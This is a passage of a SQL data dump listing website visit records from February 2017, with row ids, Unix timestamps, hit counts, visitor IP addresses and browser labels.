8083851,1,1,0,0,'51.255.65.82','other'),(90420,1488085112,1,1,0,0,'164.132.161.2','other'),(90421,1488085163,1,1,0,0,'164.132.161.8','other'),(90422,1488085268,1,1,0,0,'164.132.161.34','other'),(90423,1488085375,1,1,0,0,'51.255.65.55','other'),(90424,1488085521,1,1,0,0,'195.154.181.15','chrome'),(90425,1488085530,1,1,0,0,'163.172.64.252','other'),(90426,1488085778,1,1,0,0,'164.132.161.18','other'),(90427,1488086382,1,1,0,0,'163.172.64.182','other'),(90428,1488086522,1,1,0,0,'51.255.65.53','other'),(90429,1488086669,1,1,0,0,'66.249.75.28','chrome'),(90430,1488087274,1,1,0,0,'91.196.178.40','chrome'),(90431,1488087840,1,1,0,0,'164.132.161.61','other'),(90432,1488088331,1,1,0,0,'91.196.178.34','chrome'),(90433,1488088608,1,0,1,0,'66.249.69.56',''),(90434,1488088757,1,1,0,0,'51.255.65.83','other'),(90435,1488089215,1,1,0,0,'91.200.12.49','chrome'),(90436,1488089348,1,1,0,0,'95.24.120.24','msie'),(90437,1488089661,1,1,0,0,'82.145.221.67','other'),(90438,1488089860,1,1,0,0,'180.76.15.30','other'),(90439,1488090020,1,1,0,0,'94.179.43.96','firefox'),(90440,1488090807,1,0,1,0,'66.249.69.60',''),(90441,1488091306,1,1,0,0,'176.195.111.135','msie'),(90442,1488091619,1,1,0,0,'51.255.65.40','other'),(90443,1488092126,1,1,0,0,'163.172.64.226','other'),(90444,1488092335,1,1,0,0,'164.132.161.37','other'),(90445,1488092338,1,1,0,0,'51.255.65.27','other'),(90446,1488092370,1,1,0,0,'77.37.137.48','msie'),(90447,1488092382,21,21,0,0,'204.12.208.10','other'),(90448,1488093033,1,1,0,0,'51.255.65.29','other'),(90449,1488093115,1,1,0,0,'164.132.161.74','other'),(90450,1488093381,1,1,0,0,'51.255.65.56','other'),(90451,1488093546,1,1,0,0,'66.249.93.156','chrome'),(90452,1488094827,1,1,0,0,'164.132.161.52','other'),(90453,1488096674,1,1,0,0,'157.55.39.193','other'),(90454,1488096704,2,0,2,0,'66.249.75.28',''),(90455,1488096868,1,0,1,0,'66.249.75.25',''),(90456,1488096890,1,1,0,0,'164.132.161.47','other'),(90457,1488097005,1,0,1,0,'66.249.69.56',''),(90458,1488097539,1,1,0,0,'51.255.65.25','other'),(90459,1488098546,2,2,0,0,'88.198.54.49','other'),(90460,1488099918,1,0,1,0,'66.249.69.52',''),(90461,1488100123,1,1,0,0,'51.255.65.91','other'),(90462,1488100278,1,1,0,0,'40.77.167.26','other'),(90463,1488100649,1,1,0,0,'164.132.161.45','other'),(90464,1488101563,1,1,0,0,'164.132.161.22','other'),(90465,1488102076,1,1,0,0,'51.255.65.36','other'),(90466,1488102241,1,0,1,0,'68.180.229.99',''),(90467,1488102353,1,1,0,0,'40.77.167.100','other'),(90468,1488102485,1,1,0,0,'51.255.65.21','other'),(90469,1488103031,1,0,1,0,'66.249.75.28',''),(90470,1488105069,1,0,1,0,'66.249.69.60',''),(90471,1488105363,1,0,1,0,'66.249.75.25',''),(90472,1488105388,1,0,1,0,'66.249.69.56',''),(90473,1488105494,1,1,0,0,'51.255.65.25','other'),(90475,1488105989,1,1,0,0,'164.132.161.91','other'),(90476,1488106265,1,1,0,0,'51.255.65.62','other'),(90477,1488107042,1,0,1,0,'66.249.75.28',''),(90478,1488107060,1,1,0,0,'93.158.152.84','other'),(90479,1488108238,1,0,1,0,'66.249.69.60',''),(90480,1488108522,1,1,0,0,'164.132.161.42','other'),(90481,1488108673,1,0,1,0,'66.249.75.22',''),(90482,1488109197,1,1,0,0,'91.196.178.133','chrome'),(90483,1488109987,1,1,0,0,'163.172.64.239','other'),(90484,1488110093,1,0,1,0,'66.249.75.25',''),(90485,1488110096,2,0,2,0,'66.249.69.60',''),(90486,1488111328,1,1,0,0,'91.196.178.35','chrome'),(90487,1488111346,1,1,0,0,'141.8.183.19','other'),(90488,1488111762,1,0,1,0,'68.180.229.99',''),(90489,1488112029,1,1,0,0,'162.210.196.130','other'),(90490,1488112253,1,1,0,0,'46.201.175.171','firefox'),(90491,1488112890,2,0,2,0,'66.249.69.56',''),(90492,1488114690,1,1,0,0,'51.255.65.88','other'),(90493,1488114886,1,1,0,0,'51.255.65.20','other'),(90494,1488115274,1,0,1,0,'66.249.69.56',''),(90495,1488115484,1,1,0,0,'51.255.65.44','other'),(90496,1488115735,1,1,0,0,'164.132.161.95','other'),(90497,1488116598,1,1,0,0,'91.196.178.71','chrome'),(90498,1488116618,1,1,0,0,'130.193.51.19','other'),(90499,1488117198,1,1,0,0,'40.77.167.26','other'),(90500,1488117322,1,0,1,0,'66.249.69.60',''),(90501,1488117436,1,1,0,0,'163.172.64.237','other'),(90502,1488118707,1,1,0,0,'51.255.65.95','other'),(90503,1488119050,1,1,0,0,'157.55.39.109','other'),(90504,1488120289,1,1,0,0,'51.255.65.62','other'),(90505,1488121080,1,0,1,0,'66.249.69.52',''),(90506,1488121217,1,1,0,0,'51.255.65.59','other'),(90507,1488121261,1,1,0,0,'92.113.127.235','chrome'),(90508,1488121471,1,1,0,0,'163.172.64.216','other'),(90509,1488121706,1,0,1,0,'66.249.75.22',''),(90510,1488121932,1,1,0,0,'178.212.111.21','chrome'),(90511,1488123608,1,1,0,0,'91.196.178.135','opera'),(90512,1488123797,1,1,0,0,'164.132.161.87','other'),(90513,1488123829,1,1,0,0,'180.76.15.17','other'),(90514,1488124004,1,1,0,0,'164.132.161.63','other'),(90515,1488124611,1,0,1,0,'66.249.69.60',''),(90516,1488125956,1,1,0,0,'164.132.161.27','other'),(90517,1488126932,1,1,0,0,'217.99.216.122','chrome'),(90518,1488127755,2,0,2,0,'66.249.66.81',''),(90519,1488128358,1,1,0,0,'164.132.161.80','other'),(90520,1488128680,1,1,0,0,'163.172.64.224','other'),(90521,1488129071,1,0,1,0,'66.249.66.87',''),(90522,1488129118,1,0,1,0,'66.249.66.81',''),(90523,1488129240,2,0,2,0,'66.249.66.180',''),(90524,1488130104,1,1,0,0,'164.132.161.51','other'),(90525,1488130565,1,0,1,0,'66.249.66.81',''),(90526,1488130610,1,1,0,0,'164.132.161.59','other'),(90527,1488131035,1,1,0,0,'164.132.161.65','other'),(90528,1488131036,1,1,0,0,'91.196.178.39','firefox'),(90529,1488131263,1,0,1,0,'66.249.66.87',''),(90530,1488132972,1,1,0,0,'51.255.65.55','other'),(90531,1488133226,1,1,0,0,'82.145.221.227','other'),(90532,1488133594,1,1,0,0,'51.255.65.64','other'),(90533,1488134074,1,0,1,0,'66.249.66.183',''),(90534,1488134293,1,0,1,0,'66.249.66.95',''),(90535,1488134767,1,0,1,0,'68.180.229.99',''),(90536,1488136374,1,1,0,0,'51.255.65.69','other'),(90537,1488138027,1,1,0,0,'51.255.65.83','other'),(90538,1488138486,1,1,0,0,'82.145.220.185','chrome'),(90539,1488138633,1,1,0,0,'66.249.66.81','chrome'),(90540,1488139615,1,0,1,0,'66.249.66.81',''),(90541,1488139721,1,1,0,0,'51.255.65.67','other'),(90542,1488139782,1,1,0,0,'164.132.161.55','other'),(90543,1488139791,1,1,0,0,'163.172.68.132','other'),(90544,1488139959,1,0,1,0,'66.249.66.180',''),(90545,1488140053,1,1,0,0,'91.196.178.67','firefox'),(90546,1488140637,1,1,0,0,'40.77.167.100','other'),(90547,1488140924,1,0,1,0,'66.249.66.84',''),(90548,1488141562,1,1,0,0,'164.132.161.15','other'),(90549,1488141922,1,1,0,0,'91.196.178.164','chrome'),(90550,1488142163,1,1,0,0,'51.255.65.72','other'),(90551,1488143021,1,1,0,0,'163.172.64.254','other'),(90552,1488143419,1,1,0,0,'164.132.161.47','other'),(90553,1488143477,2,0,2,0,'66.249.66.180',''),(90554,1488143610,1,1,0,0,'51.255.65.26','other'),(90555,1488144738,1,1,0,0,'164.132.161.4','other'),(90556,1488145821,1,1,0,0,'51.255.65.69','other'),(90557,1488146140,2,0,2,0,'66.249.66.180',''),(90558,1488146404,1,1,0,0,'164.132.161.74','other'),(90559,1488146557,2,1,1,0,'66.249.66.183',''),(90560,1488146704,1,1,0,0,'178.154.149.10','other'),(90561,1488146721,2,1,1,0,'66.249.66.180',''),(90562,1488147952,1,0,1,0,'66.249.66.81',''),(90563,1488148243,1,0,1,0,'68.180.229.99',''),(90564,1488149425,1,1,0,0,'164.132.161.59','other'),(90565,1488150158,1,1,0,0,'157.55.39.193','other'),(90566,1488150391,1,1,0,0,'164.132.161.64','other'),(90567,1488150534,1,1,0,0,'51.255.65.65','other'),(90568,1488151074,1,1,0,0,'130.193.51.19','other'),(90569,1488151338,1,1,0,0,'141.8.142.58','other'),(90570,1488152175,1,1,0,0,'130.193.51.19','other'),(90571,1488152179,1,1,0,0,'141.8.183.19','other'),(90572,1488152182,1,1,0,0,'93.158.152.40','other'),(90573,1488152186,1,1,0,0,'141.8.142.61','other'),(90574,1488152190,1,1,0,0,'93.158.152.84','other'),(90575,1488152194,1,1,0,0,'141.8.142.175','other'),(90576,1488152197,1,1,0,0,'178.154.149.11','other'),(90577,1488153712,1,1,0,0,'40.77.167.100','other'),(90578,1488153763,1,1,0,0,'141.8.142.175','other'),(90579,1488153782,1,1,0,0,'141.8.142.67','other'),(90580,1488153796,2,2,0,0,'141.8.183.25','other'),(90581,1488153799,1,1,0,0,'178.154.189.31','other'),(90582,1488153816,1,1,0,0,'163.172.64.189','other'),(90583,1488154122,1,1,0,0,'66.249.66.183','chrome'),(90584,1488154192,1,0,1,0,'66.249.66.87',''),(90585,1488154261,1,1,0,0,'164.132.161.91','other'),(90586,1488154369,1,1,0,0,'51.255.65.29','other'),(90587,1488154429,1,1,0,0,'51.255.65.89','other'),(90588,1488154468,1,1,0,0,'91.196.178.38','chrome'),(90589,1488154553,1,0,1,0,'66.249.66.84',''),(90590,1488156804,1,1,0,0,'141.8.183.25','other'),(90591,1488157612,1,1,0,0,'80.64.173.162','other'),(90592,1488157745,1,1,0,0,'93.158.152.84','other'),(90593,1488158369,1,1,0,0,'164.132.161.40','other'),(90594,1488158392,1,1,0,0,'51.255.65.56','other'),(90595,1488159134,2,2,0,0,'141.8.142.61','other'),(90596,1488159329,1,0,1,0,'66.249.66.183',''),(90597,1488159487,1,1,0,0,'130.193.51.19','other'),(90598,1488159565,1,1,0,0,'164.132.161.77','other'),(90599,1488159800,1,0,1,0,'66.249.66.81',''),(90600,1488159960,1,1,0,0,'40.77.167.100','other'),(90601,1488160466,3,3,0,0,'80.64.173.162','other'),(90602,1488160687,1,0,1,0,'66.249.66.183',''),(90603,1488161115,1,1,0,0,'163.172.64.220','other'),(90604,1488161254,1,1,0,0,'163.172.64.246','other'),(90605,1488161639,1,1,0,0,'66.249.66.87','chrome'),(90606,1488162176,1,1,0,0,'163.172.64.199','other'),(90607,1488162505,1,0,1,0,'66.249.66.84',''),(90608,1488162697,1,1,0,0,'5.255.253.47','other'),(90609,1488162806,1,1,0,0,'66.249.66.177','chrome'),(90610,1488162937,1,1,0,0,'141.8.132.41','other'),(90611,1488163085,1,1,0,0,'130.193.51.19','other'),(90612,1488163342,1,1,0,0,'91.200.12.49','chrome'),(90613,1488163759,1,1,0,0,'51.255.65.27','other'),(90614,1488163764,1,0,1,0,'66.249.66.81',''),(90615,1488164065,1,0,1,0,'66.249.66.180',''),(90616,1488164169,1,1,0,0,'164.132.161.66','other'),(90617,1488164264,1,1,0,0,'164.132.161.14','other'),(90618,1488164414,1,1,0,0,'66.249.66.180','chrome'),(90619,1488165855,1,1,0,0,'51.255.65.23','other'),(90620,1488165886,1,0,1,0,'66.249.66.81',''),(90621,1488166172,1,1,0,0,'141.8.142.58','other'),(90622,1488166993,1,0,1,0,'66.249.66.183',''),(90623,1488167442,1,1,0,0,'164.132.161.18','other'),(90624,1488168268,1,0,1,0,'66.249.66.99',''),(90625,1488168314,1,1,0,0,'164.132.161.87','other'),(90626,1488168795,1,1,0,0,'164.132.161.82','other'),(90627,1488169214,1,0,1,0,'66.249.66.177',''),(90628,1488169481,1,1,0,0,'51.255.65.64','other'),(90629,1488170199,1,1,0,0,'163.172.64.217','other'),(90630,1488170462,1,0,1,0,'66.249.66.177',''),(90631,1488170964,1,1,0,0,'164.132.161.45','other'),(90632,1488171303,1,1,0,0,'164.132.161.85','other'),(90633,1488172269,1,0,1,0,'157.55.39.193',''),(90634,1488172484,1,1,0,0,'163.172.64.237','other'),(90635,1488172660,4,4,0,0,'91.209.51.22','other'),(90636,1488173167,1,1,0,0,'163.172.64.225','other'),(90637,1488173706,1,1,0,0,'51.255.65.65','other'),(90638,1488173870,1,1,0,0,'91.196.178.71','firefox'),(90639,1488174242,1,1,0,0,'163.172.64.177','other'),(90640,1488174258,1,1,0,0,'51.255.65.91','other'),(90641,1488174516,1,1,0,0,'66.249.66.183','chrome'),(90642,1488174822,1,1,0,0,'180.76.15.142','other'),(90643,1488175440,1,0,1,0,'66.249.66.177',''),(90644,1488175476,3,0,3,0,'66.249.66.180',''),(90645,1488175575,1,1,0,0,'141.8.142.58','other'),(90646,1488175578,1,1,0,0,'130.193.51.14','other'),(90647,1488175614,1,0,1,0,'66.249.66.84',''),(90648,1488175861,1,1,0,0,'163.172.64.178','other'),(90649,1488176113,1,1,0,0,'91.196.178.72','firefox'),(90650,1488176175,1,0,1,0,'66.249.66.81',''),(90651,1488176832,1,1,0,0,'180.76.15.23','other'),(90652,1488176899,1,1,0,0,'91.196.178.70','chrome'),(90653,1488177227,1,1,0,0,'66.249.93.13','chrome'),(90654,1488177397,1,1,0,0,'95.132.57.224','chrome'),(90655,1488178356,1,1,0,0,'91.196.178.70','chrome'),(90656,1488178566,1,1,0,0,'46.200.58.60','chrome'),(90657,1488178875,1,1,0,0,'141.8.142.67','other'),(90658,1488178879,1,1,0,0,'141.8.142.61','other'),(90659,1488179009,1,0,1,0,'66.249.66.81',''),(90660,1488179156,1,1,0,0,'180.76.15.136','other'),(90661,1488179359,2,2,0,0,'51.255.173.53','other'),(90662,1488180408,1,1,0,0,'91.124.231.32','chrome'),(90663,1488181882,1,1,0,0,'78.111.190.28','chrome'),(90664,1488181957,1,1,0,0,'94.179.120.164','chrome'),(90665,1488182129,1,0,1,0,'66.249.66.81',''),(90666,1488182392,1,1,0,0,'91.196.178.135','chrome'),(90667,1488182446,1,0,1,0,'66.249.66.84',''),(90668,1488182578,1,0,1,0,'66.249.66.177',''),(90669,1488182878,1,1,0,0,'94.179.120.164','chrome'),(90670,1488183172,1,1,0,0,'91.211.132.60','chrome'),(90671,1488183516,1,1,0,0,'192.36.27.7','chrome'),(90672,1488183958,1,1,0,0,'130.180.220.152','firefox'),(90673,1488184539,1,0,1,0,'66.249.66.177',''),(90674,1488185063,1,1,0,0,'91.196.178.72','chrome'),(90675,1488185148,1,1,0,0,'51.255.65.51','other'),(90676,1488185658,1,1,0,0,'91.196.178.66','chrome'),(90677,1488185673,1,1,0,0,'51.255.65.88','other'),(90678,1488185793,1,0,1,0,'66.249.66.183',''),(90679,1488186979,1,1,0,0,'94.179.32.187','firefox'),(90680,1488187103,1,0,1,0,'66.249.66.84',''),(90681,1488187109,1,1,0,0,'93.183.226.149','firefox'),(90682,1488187130,1,1,0,0,'141.8.142.175','other'),(90683,1488187362,1,0,1,0,'66.249.66.180',''),(90684,1488187924,1,1,0,0,'51.255.65.60','other'),(90685,1488188428,1,1,0,0,'91.196.178.161','chrome'),(90686,1488188789,1,1,0,0,'94.179.32.187','firefox'),(90687,1488189164,1,1,0,0,'164.132.161.26','other'),(90688,1488189409,1,0,1,0,'66.249.66.87',''),(90689,1488189495,1,1,0,0,'37.52.16.39','chrome'),(90690,1488189585,1,1,0,0,'95.163.177.225','chrome'),(90691,1488190019,1,1,0,0,'91.196.122.186','chrome'),(90692,1488190035,1,1,0,0,'93.74.212.147','firefox'),(90693,1488190234,1,1,0,0,'163.172.64.236','other'),(90694,1488190938,1,1,0,0,'163.172.71.225','other'),(90695,1488191038,1,1,0,0,'46.219.96.110','chrome'),(90696,1488191286,1,1,0,0,'141.8.142.78','other'),(90697,1488191290,1,1,0,0,'93.158.152.51','other'),(90698,1488191298,1,1,0,0,'93.158.152.46','other'),(90699,1488191302,1,1,0,0,'141.8.132.10','other'),(90700,1488191306,1,1,0,0,'141.8.142.61','other'),(90701,1488191467,1,1,0,0,'91.196.177.46','chrome'),(90702,1488191833,1,1,0,0,'91.196.178.37','chrome'),(90703,1488192050,1,1,0,0,'164.132.161.17','other'),(90704,1488192088,1,1,0,0,'164.132.161.28','other'),(90705,1488193358,1,1,0,0,'164.132.161.20','other'),(90706,1488193893,2,0,2,0,'66.249.66.84',''),(90707,1488194136,1,0,1,0,'66.249.66.81',''),(90708,1488195377,1,0,1,0,'66.249.66.81',''),(90709,1488195527,1,1,0,0,'51.255.65.47','other'),(90710,1488195588,1,1,0,0,'91.196.178.37','chrome'),(90711,1488196374,1,1,0,0,'178.92.53.26','chrome'),(90712,1488196867,1,1,0,0,'51.255.65.3','other'),(90713,1488197016,1,1,0,0,'164.132.161.26','other'),(90714,1488197092,1,1,0,0,'163.172.64.245','other'),(90715,1488198040,1,1,0,0,'164.132.161.59','other'),(90716,1488198491,1,1,0,0,'157.55.39.193','other'),(90717,1488199211,1,1,0,0,'157.55.39.109','other'),(90718,1488199247,1,1,0,0,'193.24.221.34','chrome'),(90719,1488199268,1,1,0,0,'77.121.112.38','msie'),(90720,1488200520,1,1,0,0,'91.197.185.228','chrome'),(90721,1488200766,1,1,0,0,'130.193.50.6','other'),(90722,1488200769,1,1,0,0,'93.158.152.84','other'),(90723,1488200773,2,2,0,0,'141.8.142.67','other'),(90724,1488200777,1,1,0,0,'130.193.51.19','other'),(90725,1488200781,2,2,0,0,'141.8.142.58','other'),(90726,1488200792,1,1,0,0,'141.8.183.25','other'),(90727,1488200844,1,1,0,0,'130.193.50.34','other'),(90728,1488200855,1,1,0,0,'141.8.183.19','other'),(90729,1488201186,1,1,0,0,'91.196.178.162','chrome'),(90730,1488201452,2,2,0,0,'95.135.231.74','firefox'),(90731,1488202407,1,1,0,0,'91.197.185.228','chrome'),(90732,1488202538,1,1,0,0,'92.113.127.234','chrome'),(90733,1488202556,1,1,0,0,'212.111.196.35','chrome'),(90734,1488203265,2,2,0,0,'40.77.167.100','other'),(90735,1488203440,1,0,1,0,'66.249.66.87',''),(90736,1488204610,1,1,0,0,'91.196.177.46','firefox'),(90737,1488204630,1,1,0,0,'46.133.242.121','firefox'),(90738,1488204662,1,1,0,0,'51.255.65.64','other'),(90739,1488204989,1,1,0,0,'164.132.161.72','other'),(90740,1488205937,1,1,0,0,'109.108.87.130','chrome'),(90741,1488206038,1,1,0,0,'180.76.15.142','other'),(90742,1488206354,1,1,0,0,'51.255.65.85','other'),(90743,1488206480,1,1,0,0,'91.200.12.49','chrome'),(90744,1488207342,1,0,1,0,'66.249.66.87',''),(90745,1488207376,1,1,0,0,'51.255.65.57','other'),(90746,1488207635,1,1,0,0,'164.132.161.91','other'),(90747,1488207827,1,1,0,0,'51.255.65.59','other'),(90748,1488208238,1,1,0,0,'163.172.64.191','other'),(90749,1488208332,1,0,1,0,'66.249.66.180',''),(90750,1488208755,1,1,0,0,'51.255.65.47','other'),(90751,1488209102,1,1,0,0,'91.196.178.66','chrome'),(90752,1488209117,1,1,0,0,'51.255.65.39','other'),(90753,1488209627,1,0,1,0,'66.249.66.177',''),(90754,1488209653,1,1,0,0,'130.193.50.32','other'),(90755,1488209657,2,2,0,0,'130.193.50.6','other'),(90756,1488209660,1,1,0,0,'93.158.152.75','other'),(90757,1488210014,1,1,0,0,'51.255.65.74','other'),(90758,1488210435,1,1,0,0,'40.77.167.66','other'),(90759,1488210534,1,1,0,0,'66.249.66.177','chrome'),(90760,1488210780,1,1,0,0,'141.8.183.25','other'),(90761,1488210805,1,1,0,0,'164.132.161.41','other'),(90762,1488210876,1,1,0,0,'93.158.152.84','other'),(90763,1488211260,1,1,0,0,'130.193.50.34','other'),(90764,1488211723,1,1,0,0,'51.255.65.95','other'),(90765,1488212402,1,0,1,0,'66.249.66.180',''),(90766,1488212414,1,1,0,0,'91.196.178.164','chrome'),(90767,1488212663,1,1,0,0,'51.255.65.6','other'),(90768,1488212966,1,1,0,0,'51.255.65.81','other'),(90769,1488213032,1,1,0,0,'51.255.65.17','other'),(90770,1488213152,1,0,1,0,'66.249.66.177',''),(90771,1488215953,1,1,0,0,'164.132.161.26','other'),(90772,1488215959,1,0,1,0,'66.249.66.84',''),(90773,1488216339,1,1,0,0,'51.255.65.40','other'),(90774,1488216657,1,1,0,0,'91.196.178.33','chrome'),(90775,1488216872,1,0,1,0,'66.249.66.87',''),(90776,1488216950,1,1,0,0,'207.46.13.85','other'),(90777,1488216989,1,1,0,0,'95.135.91.156','firefox'),(90778,1488217490,1,1,0,0,'51.255.65.95','other'),(90779,1488217652,1,1,0,0,'162.210.196.98','other'),(90780,1488218582,1,1,0,0,'91.196.178.67','firefox'),(90781,1488218924,1,1,0,0,'163.172.64.189','other'),(90782,1488220176,1,1,0,0,'164.132.161.80','other'),(90783,1488220355,1,1,0,0,'51.255.65.89','other'),(90784,1488220999,1,1,0,0,'91.196.178.68','chrome'),(90785,1488221033,1,1,0,0,'163.172.64.254','other'),(90786,1488223265,1,1,0,0,'157.55.39.148','other'),(90787,1488223335,1,1,0,0,'91.196.178.163','chrome'),(90788,1488223497,1,1,0,0,'163.172.64.189','other'),(90789,1488223637,1,1,0,0,'94.179.81.252','firefox'),(90790,1488223702,1,0,1,0,'66.249.66.180',''),(90791,1488224568,1,1,0,0,'164.132.161.45','other'),(90792,1488225209,1,1,0,0,'157.55.39.148','other'),(90793,1488225228,1,1,0,0,'157.55.39.254','other'),(90794,1488225423,1,1,0,0,'164.132.161.15','other'),(90795,1488226053,1,1,0,0,'188.163.82.15','chrome'),(90796,1488226309,1,1,0,0,'46.201.206.101','chrome'),(90797,1488226489,1,1,0,0,'51.255.65.38','other'),(90798,1488226932,1,1,0,0,'46.211.69.221','chrome'),(90799,1488227227,1,1,0,0,'164.132.161.62','other'),(90800,1488227658,1,1,0,0,'51.255.65.55','other'),(90801,1488228285,1,1,0,0,'164.132.161.74','other'),(90802,1488228560,1,1,0,0,'164.132.161.33','other'),(90803,1488228767,1,1,0,0,'51.255.65.70','other'),(90804,1488229052,1,0,1,0,'66.249.75.179',''),(90805,1488229264,1,1,0,0,'51.255.65.25','other'),(90806,1488229301,1,1,0,0,'51.255.65.51','other'),(90807,1488229695,1,1,0,0,'51.255.65.97','other'),(90808,1488230335,1,0,1,0,'66.249.75.28',''),(90809,1488231051,1,1,0,0,'52.86.176.3','other'),(90810,1488232083,1,1,0,0,'164.132.161.18','other'),(90811,1488233785,1,0,1,0,'66.249.75.22',''),(90812,1488234638,1,1,0,0,'37.54.101.78','chrome'),(90813,1488235824,1,1,0,0,'164.132.161.67','other'),(90814,1488235880,1,1,0,0,'163.172.64.182','other'),(90815,1488235898,1,0,1,0,'66.249.75.22',''),(90816,1488236723,1,1,0,0,'164.132.161.44','other'),(90817,1488237464,1,1,0,0,'157.55.39.244','other'),(90818,1488238802,1,1,0,0,'164.132.161.89','other'),(90819,1488239286,1,1,0,0,'51.255.65.22','other'),(90820,1488239635,1,1,0,0,'207.46.13.12','other'),(90821,1488239753,1,0,1,0,'66.249.75.183',''),(90822,1488240872,1,0,1,0,'66.249.75.22',''),(90823,1488242069,1,1,0,0,'180.76.15.28','other'),(90824,1488242781,1,1,0,0,'164.132.161.21','other'),(90825,1488242968,1,1,0,0,'180.76.15.140','other'),(90826,1488243212,1,1,0,0,'180.76.15.29','other'),(90827,1488243213,1,0,1,0,'66.249.75.28',''),(90828,1488243862,1,1,0,0,'157.55.39.148','other'),(90829,1488244942,1,1,0,0,'163.172.64.246','other'),(90830,1488245349,1,0,1,0,'66.249.75.187',''),(90831,1488245521,1,0,1,0,'66.249.75.22',''),(90832,1488245756,1,1,0,0,'51.255.65.24','other'),(90833,1488245861,1,1,0,0,'141.8.132.10','other'),(90834,1488246565,1,1,0,0,'164.132.161.68','other'),(90835,1488246725,1,1,0,0,'157.55.39.148','other'),(90836,1488246992,1,1,0,0,'163.172.64.178','other'),(90837,1488247081,1,0,1,0,'66.249.75.179',''),(90838,1488247264,1,0,1,0,'66.249.75.25',''),(90839,1488247833,1,0,1,0,'66.249.75.187',''),(90840,1488248222,1,1,0,0,'164.132.161.87','other'),(90841,1488248676,1,1,0,0,'163.172.64.193','other'),(90842,1488249995,1,1,0,0,'164.132.161.31','other'),(90843,1488250247,1,1,0,0,'207.46.13.12','other'),(90844,1488250862,1,1,0,0,'91.200.12.49','chrome'),(90845,1488250950,1,0,1,0,'66.249.75.28',''),(90846,1488252797,1,1,0,0,'51.255.65.82','other'),(90847,1488252890,1,0,1,0,'66.249.75.28',''),(90848,1488254010,1,0,1,0,'207.46.13.14',''),(90849,1488254090,1,1,0,0,'157.55.39.244','other'),(90850,1488254544,41,41,0,0,'208.43.225.84','other'),(90851,1488254602,86,86,0,0,'208.43.225.85','other'),(90852,1488254781,1,1,0,0,'51.255.65.74','other'),(90853,1488255700,1,1,0,0,'207.46.13.12','other'),(90854,1488255821,1,0,1,0,'66.249.75.179',''),(90855,1488256254,1,1,0,0,'40.77.167.67','other'),(90856,1488257868,1,0,1,0,'66.249.75.28',''),(90857,1488258079,1,1,0,0,'164.132.161.33','other'),(90858,1488258111,1,1,0,0,'163.172.69.178','other'),(90859,1488258895,2,0,2,0,'66.249.75.22',''),(90860,1488259336,1,1,0,0,'51.255.65.16','other'),(90861,1488259524,1,0,1,0,'66.249.75.187',''),(90862,1488259842,1,1,0,0,'51.255.65.54','other'),(90863,1488260020,1,1,0,0,'91.196.178.72','firefox'),(90864,1488261437,1,1,0,0,'163.172.64.235','other'),(90865,1488261648,1,0,1,0,'66.249.75.187',''),(90866,1488261655,1,1,0,0,'157.55.39.148','other'),(90867,1488261787,1,1,0,0,'163.172.64.241','other'),(90868,1488262705,2,2,0,0,'91.196.178.72','firefox'),(90869,1488262826,1,0,1,0,'66.249.75.183',''),(90870,1488262923,1,1,0,0,'66.249.93.15','chrome'),(90871,1488262979,1,1,0,0,'164.132.161.20','other'),(90872,1488263481,1,1,0,0,'91.196.178.66','chrome'),(90873,1488264296,1,1,0,0,'91.196.178.162','chrome'),(90874,1488264405,1,1,0,0,'164.132.161.57','other'),(90875,1488264548,1,1,0,0,'51.255.65.47','other'),(90876,1488264937,1,0,1,0,'66.249.75.13',''),(90877,1488265125,1,0,1,0,'66.249.75.183',''),(90878,1488266264,1,1,0,0,'178.154.189.31','other'),(90879,1488266452,1,1,0,0,'157.55.39.123','other'),(90880,1488267431,1,1,0,0,'163.172.64.188','other'),(90881,1488267616,1,1,0,0,'91.196.178.67','chrome'),(90882,1488267622,1,1,0,0,'141.8.132.10','other'),(90883,1488267625,1,1,0,0,'130.193.51.14','other'),(90884,1488267844,1,1,0,0,'51.255.65.44','other'),(90885,1488267980,2,2,0,0,'141.8.142.61','other'),(90886,1488268048,1,1,0,0,'94.179.127.84','firefox'),(90887,1488268680,1,1,0,0,'51.255.65.21','other'),(90888,1488268731,1,1,0,0,'195.206.232.121','firefox'),(90889,1488268839,1,1,0,0,'95.132.132.46','firefox'),(90890,1488269266,1,1,0,0,'78.111.190.27','firefox'),(90891,1488269628,1,1,0,0,'157.55.39.122','other'),(90892,1488269694,1,1,0,0,'163.172.64.189','other'),(90893,1488269884,1,0,1,0,'66.249.75.183',''),(90894,1488270060,1,1,0,0,'91.196.178.72','firefox'),(90895,1488270198,1,1,0,0,'91.196.178.66','chrome'),(90896,1488270423,1,1,0,0,'164.132.161.10','other'),(90897,1488270867,1,1,0,0,'51.255.65.16','other'),(90898,1488271121,1,1,0,0,'91.196.177.15','chrome'),(90899,1488271397,1,0,1,0,'66.249.75.187',''),(90900,1488271414,1,1,0,0,'163.172.64.252','other'),(90901,1488271594,1,1,0,0,'51.255.65.18','other'),(90902,1488271603,1,1,0,0,'164.132.161.74','other'),(90903,1488271640,1,1,0,0,'185.126.252.158','chrome'),(90904,1488272025,1,1,0,0,'163.172.64.251','other'),(90905,1488272215,1,1,0,0,'178.92.23.208','chrome'),(90906,1488272270,1,1,0,0,'164.132.161.52','other'),(90907,1488273381,1,1,0,0,'164.132.161.85','other'),(90908,1488273955,1,0,1,0,'66.249.75.25',''),(90909,1488274057,2,0,2,0,'66.249.75.22',''),(90910,1488274691,1,1,0,0,'178.94.126.6','chrome'),(90911,1488274994,1,1,0,0,'164.132.161.31','other'),(90912,1488275654,1,0,1,0,'66.249.75.22',''),(90913,1488276551,1,1,0,0,'51.255.65.35','other'),(90914,1488276657,1,1,0,0,'194.242.103.148','chrome'),(90915,1488276882,1,1,0,0,'91.196.177.46','chrome'),(90916,1488276949,1,1,0,0,'164.132.161.41','other'),(90917,1488277097,1,1,0,0,'164.132.161.89','other'),(90918,1488278245,1,1,0,0,'164.132.161.23','other'),(90919,1488278959,2,0,2,0,'66.249.75.187',''),(90920,1488279563,1,1,0,0,'164.132.161.68','other'),(90921,1488279930,1,1,0,0,'51.255.65.16','other'),(90922,1488280364,1,1,0,0,'91.196.178.166','chrome'),(90923,1488281485,1,1,0,0,'163.172.64.241','other'),(90924,1488281540,1,1,0,0,'91.196.178.129','firefox'),(90925,1488282307,1,1,0,0,'91.196.178.166','chrome'),(90926,1488282760,1,1,0,0,'37.52.26.101','chrome'),(90927,1488283142,1,1,0,0,'51.255.65.77','other'),(90928,1488283909,1,1,0,0,'91.196.178.39','firefox'),(90929,1488284239,1,1,0,0,'37.55.194.164','chrome'),(90930,1488284395,1,1,0,0,'130.180.212.168','chrome'),(90931,1488284597,1,1,0,0,'164.132.161.12','other'),(90932,1488284603,1,1,0,0,'157.55.39.120','other'),(90933,1488285572,1,1,0,0,'91.